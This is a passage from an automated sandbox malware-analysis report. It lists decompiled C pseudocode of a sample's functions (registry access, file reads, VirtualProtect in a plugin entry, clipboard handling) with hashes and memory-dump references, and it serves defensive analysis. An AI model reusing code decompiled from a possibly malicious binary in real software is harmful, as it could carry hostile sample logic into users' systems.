                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FilePointerwsprintf
                                  • String ID:
                                  • API String ID: 327478801-0
                                  • Opcode ID: 2bf05ba17718530c6fe0701af64caadc32223a7f1939e216a8af0a1093029193
                                  • Instruction ID: 9b79bc57a545877cc82f6085c62fac977e34f5f1dcfdecb1c33821ac61e83e99
                                  • Opcode Fuzzy Hash: 2bf05ba17718530c6fe0701af64caadc32223a7f1939e216a8af0a1093029193
                                  • Instruction Fuzzy Hash: E4E04F77A04110ABD701F7E56E4ADBF7668EB04319B14853BF501F10D2C6BD58019A6E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402B11 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E00402B11(void* __eflags, void* _a4) {
				signed int _t6;
				char* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t6 =  *0x42ec50; // 0x100
				_t8 = E00402A07(0x22);
				_t9 =  *0x40afc0; // 0x19e590
				_t11 = RegOpenKeyExA(E00402AFC( *((intOrPtr*)(_t9 + 4))), _t8, 0, _t6 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}







                                  0x00402b18
                                  0x00402b25
                                  0x00402b2b
                                  0x00402b39
                                  0x00402b41
                                  0x00402b49

                                  APIs
                                  • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B39
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: d58126dc33ff389aa40f2a05a53f78a853406ba41794b6351ae5040632aa3466
                                  • Instruction ID: 0b28659bbc1d1e591b010bb8b89045cb2232f94fbe33c9534bf79020f9b3c98c
                                  • Opcode Fuzzy Hash: d58126dc33ff389aa40f2a05a53f78a853406ba41794b6351ae5040632aa3466
                                  • Instruction Fuzzy Hash: EBE0E676250109BFD710EFE6DD47FA57BDCB704754F004425B608E7091CA74E5509B59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040308E Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040308E(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409018, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                  0x00403092
                                  0x004030a5
                                  0x004030ad
                                  0x00000000
                                  0x004030b4
                                  0x00000000
                                  0x004030b6

                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBB,000000FF,00000004,00000000,00000000,00000000), ref: 004030A5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                  • Instruction ID: 5f111b40a0b3629fd10373ff15fdd2cb33e52a8e4a636b5fd16f787c111e88a9
                                  • Opcode Fuzzy Hash: e68bf106eb3186c7e106c3f9a269c6ae9a01f653eb00a6b034ce70840e3ede78
                                  • Instruction Fuzzy Hash: 5FE08C32141118BBCF215E519C00AE73B5CEB003A2F00C032BA08E6290D630EA599BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 100026C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x10004038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x1000404c, 4, 0x40, 0x1000403c); // executed
					 *0x1000404c = 0xc2;
					 *0x1000403c = 0;
					 *0x10004044 = 0;
					 *0x10004058 = 0;
					 *0x10004048 = 0;
					 *0x10004040 = 0;
					 *0x10004050 = 0;
					 *0x1000404e = 0;
				}
				return 1;
			}



                                  0x100026cb
                                  0x100026d0
                                  0x100026e0
                                  0x100026e8
                                  0x100026ef
                                  0x100026f4
                                  0x100026f9
                                  0x100026fe
                                  0x10002703
                                  0x10002708
                                  0x1000270d
                                  0x1000270d
                                  0x10002715

                                  APIs
                                  • VirtualProtect.KERNELBASE(1000404C,00000004,00000040,1000403C), ref: 100026E0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID:
                                  • API String ID: 544645111-0
                                  • Opcode ID: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                  • Instruction ID: 50d40a96d24def304b4b26cf20c6df658c6444d5d293e09e435d7040471c3010
                                  • Opcode Fuzzy Hash: 18430b4f65034898945c85cbd496d0600587ffef3804861361c874148a7acf75
                                  • Instruction Fuzzy Hash: 2BF09BF19092A0DEF360DF688CC47063FE4E7983D5B03852AE358F6269EB3445448B19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00401595() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesA(E00402A07(0xfffffff0),  *(_t11 - 0x20)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                  0x004015a0
                                  0x004015a6
                                  0x004015a8
                                  0x0040266d
                                  0x0040266d
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 4d472c43639dc04def5d2b840e89fb0869f99a80fec98c3c568aaf3f843f624b
                                  • Instruction ID: 491e9dad881d306943984f2b5cfdc1394ca5d0b553b86ee0e5f4f48b65607393
                                  • Opcode Fuzzy Hash: 4d472c43639dc04def5d2b840e89fb0869f99a80fec98c3c568aaf3f843f624b
                                  • Instruction Fuzzy Hash: 28D01233B081109BDB10DBE99E4899D77A09B04324F248637D111F11D1D6B99541561D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030C0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004030C0(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409018, _a4, 0, 0); // executed
				return _t2;
			}




                                  0x004030ce
                                  0x004030d4

                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,00008BE4), ref: 004030CE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                  • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                  • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                  • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403EDD Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403EDD(int _a4) {
				long _t2;

				_t2 = SendMessageA( *0x42eba8, 0x28, _a4, 1); // executed
				return _t2;
			}




                                  0x00403eeb
                                  0x00403ef1

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend
                                  • String ID:
                                  • API String ID: 3850602802-0
                                  • Opcode ID: 82644edcf3efe4120ad3297303d077226593b8c1deeca385b8ec1e4b65c8b5e6
                                  • Instruction ID: f46d431e8e7408228874a808ffc2914bf6276662b6e951ab0ea6f6a7c2946d50
                                  • Opcode Fuzzy Hash: 82644edcf3efe4120ad3297303d077226593b8c1deeca385b8ec1e4b65c8b5e6
                                  • Instruction Fuzzy Hash: D3B01235685200BFFE328B00DD0DF457E62F764701F008034B301240F0C6B210A1EB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004014D6 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004014D6() {
				long _t2;
				void* _t6;
				void* _t10;

				_t2 = E004029EA(_t6);
				if(_t2 <= 1) {
					_t2 = 1;
				}
				Sleep(_t2); // executed
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t10 - 4));
				return 0;
			}






                                  0x004014d7
                                  0x004014df
                                  0x004014e3
                                  0x004014e3
                                  0x004014e5
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • Sleep.KERNELBASE(00000000), ref: 004014E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 0603eb80091a95b1f602976c8f6e7bfccfb3fb5df01df8ae88225197d1fd4128
                                  • Instruction ID: acaa6b3476ad5fafda8d7447acda5005b584cdaf565da1723a927038707b88e4
                                  • Opcode Fuzzy Hash: 0603eb80091a95b1f602976c8f6e7bfccfb3fb5df01df8ae88225197d1fd4128
                                  • Instruction Fuzzy Hash: 06D0C977B141008BD750E7B9AE8995A73A8FB413293244C33E502E11A2D579D812861D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 10001215 Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E10001215() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x1000405c); // executed
				return _t1;
			}




                                  0x1000121d
                                  0x10001223

                                  APIs
                                  • GlobalAlloc.KERNELBASE(00000040,10001251,?,?,100014DE,?,10001020,10001019,00000001), ref: 1000121D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: AllocGlobal
                                  • String ID:
                                  • API String ID: 3761449716-0
                                  • Opcode ID: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                  • Instruction ID: 35b308b173d9b0532f6cde55f5bface33093279d7ce3c78a2cc6db588f634b90
                                  • Opcode Fuzzy Hash: 6989041179a6ec659f8410a82a3610e1053cc9f4ca9d652552d89decbf4b4a90
                                  • Instruction Fuzzy Hash: 6CA002B1945620DBFE429BE08D9EF1B3B25E748781F01C040E315641BCCA754010DF39
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 00404FE3 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 279windowclipboardmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E00404FE3(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				char* _t164;
				char* _t165;

				_t154 =  *0x42e384; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F77, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BBA(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x42a020;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xd;
									_t165 = _t164 + 1;
									 *_t165 = 0xa;
									_t163 = _t165 + 1;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e36c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42eba8, 8);
							__eflags =  *0x42ec2c - _t149; // 0x0
							if(__eflags == 0) {
								E00404EA5( *((intOrPtr*)( *0x4297f8 + 0x34)), _t149);
							}
							E00403E81(1);
							goto L25;
						}
						 *0x4293f0 = 2;
						E00403E81(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403F0F(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e370, _t149);
						ShowWindow(_t154, 8);
						E00403EDD(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ebb0; // 0x5aa248
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e370 = GetDlgItem(_a4, 0x403);
				 *0x42e368 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e384 = _t127;
				_v8 = _t127;
				E00403EDD( *0x42e370);
				 *0x42e374 = E00404743(4);
				 *0x42e38c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403EA8(_a4);
				if(( *0x42ebb8 & 0x00000003) != 0) {
					ShowWindow( *0x42e370, _t149);
					if(( *0x42ebb8 & 0x00000002) != 0) {
						 *0x42e370 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EDD( *0x42e368);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ebb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}



































                                  0x00404fec
                                  0x00404ff2
                                  0x00404ffb
                                  0x00404ffe
                                  0x0040518f
                                  0x00405196
                                  0x004051ba
                                  0x004051ba
                                  0x004051c0
                                  0x004051cd
                                  0x004051eb
                                  0x004051eb
                                  0x004051f2
                                  0x00405249
                                  0x00405249
                                  0x0040524d
                                  0x00000000
                                  0x00000000
                                  0x0040524f
                                  0x00405252
                                  0x00000000
                                  0x00000000
                                  0x0040525c
                                  0x00405262
                                  0x00405264
                                  0x00405267
                                  0x00405361
                                  0x00000000
                                  0x00405361
                                  0x00405276
                                  0x00405282
                                  0x00405288
                                  0x0040528b
                                  0x0040528e
                                  0x004052a3
                                  0x004052a6
                                  0x004052a6
                                  0x004052a9
                                  0x00405290
                                  0x00405295
                                  0x0040529b
                                  0x0040529e
                                  0x0040529e
                                  0x004052b9
                                  0x004052c1
                                  0x004052c2
                                  0x004052c4
                                  0x004052cd
                                  0x004052d0
                                  0x004052d7
                                  0x004052de
                                  0x004052e6
                                  0x004052e6
                                  0x004052f4
                                  0x004052fa
                                  0x004052fd
                                  0x004052fd
                                  0x00405304
                                  0x0040530a
                                  0x00405313
                                  0x0040531a
                                  0x00405323
                                  0x00405325
                                  0x00405328
                                  0x00405337
                                  0x00405339
                                  0x0040533c
                                  0x0040533d
                                  0x00405340
                                  0x00405341
                                  0x00405342
                                  0x00405342
                                  0x0040534a
                                  0x00405355
                                  0x0040535b
                                  0x0040535b
                                  0x00000000
                                  0x004052c4
                                  0x004051f4
                                  0x004051fa
                                  0x0040522a
                                  0x0040522c
                                  0x00405232
                                  0x0040523d
                                  0x0040523d
                                  0x00405244
                                  0x00000000
                                  0x00405244
                                  0x004051fe
                                  0x00405208
                                  0x00000000
                                  0x004051cf
                                  0x004051cf
                                  0x004051d5
                                  0x0040520d
                                  0x00000000
                                  0x00405216
                                  0x004051de
                                  0x004051e3
                                  0x004051e6
                                  0x00000000
                                  0x004051e6
                                  0x004051cd
                                  0x00405004
                                  0x00405008
                                  0x00405011
                                  0x00405018
                                  0x0040501b
                                  0x0040501e
                                  0x00405021
                                  0x00405022
                                  0x00405023
                                  0x0040503c
                                  0x0040503f
                                  0x00405049
                                  0x00405058
                                  0x00405060
                                  0x00405068
                                  0x0040506d
                                  0x00405070
                                  0x0040507c
                                  0x00405085
                                  0x0040508e
                                  0x004050b1
                                  0x004050b7
                                  0x004050c8
                                  0x004050cd
                                  0x004050db
                                  0x004050e9
                                  0x004050e9
                                  0x004050ee
                                  0x004050fc
                                  0x004050fc
                                  0x00405101
                                  0x00405104
                                  0x00405109
                                  0x00405115
                                  0x0040511e
                                  0x0040512b
                                  0x0040513a
                                  0x0040512d
                                  0x00405132
                                  0x00405132
                                  0x00405146
                                  0x00405146
                                  0x0040515a
                                  0x00405163
                                  0x0040516c
                                  0x0040517c
                                  0x00405188
                                  0x00405188
                                  0x00000000

                                  APIs
                                  • GetDlgItem.USER32 ref: 00405042
                                  • GetDlgItem.USER32 ref: 00405051
                                  • GetClientRect.USER32 ref: 0040508E
                                  • GetSystemMetrics.USER32 ref: 00405096
                                  • SendMessageA.USER32 ref: 004050B7
                                  • SendMessageA.USER32 ref: 004050C8
                                  • SendMessageA.USER32 ref: 004050DB
                                  • SendMessageA.USER32 ref: 004050E9
                                  • SendMessageA.USER32 ref: 004050FC
                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040511E
                                  • ShowWindow.USER32(?,00000008), ref: 00405132
                                  • GetDlgItem.USER32 ref: 00405153
                                  • SendMessageA.USER32 ref: 00405163
                                  • SendMessageA.USER32 ref: 0040517C
                                  • SendMessageA.USER32 ref: 00405188
                                  • GetDlgItem.USER32 ref: 00405060
                                    • Part of subcall function 00403EDD: SendMessageA.USER32 ref: 00403EEB
                                  • GetDlgItem.USER32 ref: 004051A5
                                  • CreateThread.KERNEL32 ref: 004051B3
                                  • CloseHandle.KERNEL32(00000000), ref: 004051BA
                                  • ShowWindow.USER32(00000000), ref: 004051DE
                                  • ShowWindow.USER32(00000000,00000008), ref: 004051E3
                                  • ShowWindow.USER32(00000008), ref: 0040522A
                                  • SendMessageA.USER32 ref: 0040525C
                                  • CreatePopupMenu.USER32 ref: 0040526D
                                  • AppendMenuA.USER32 ref: 00405282
                                  • GetWindowRect.USER32 ref: 00405295
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052B9
                                  • SendMessageA.USER32 ref: 004052F4
                                  • OpenClipboard.USER32(00000000), ref: 00405304
                                  • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040530A
                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405313
                                  • GlobalLock.KERNEL32 ref: 0040531D
                                  • SendMessageA.USER32 ref: 00405331
                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040534A
                                  • SetClipboardData.USER32 ref: 00405355
                                  • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 0040535B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
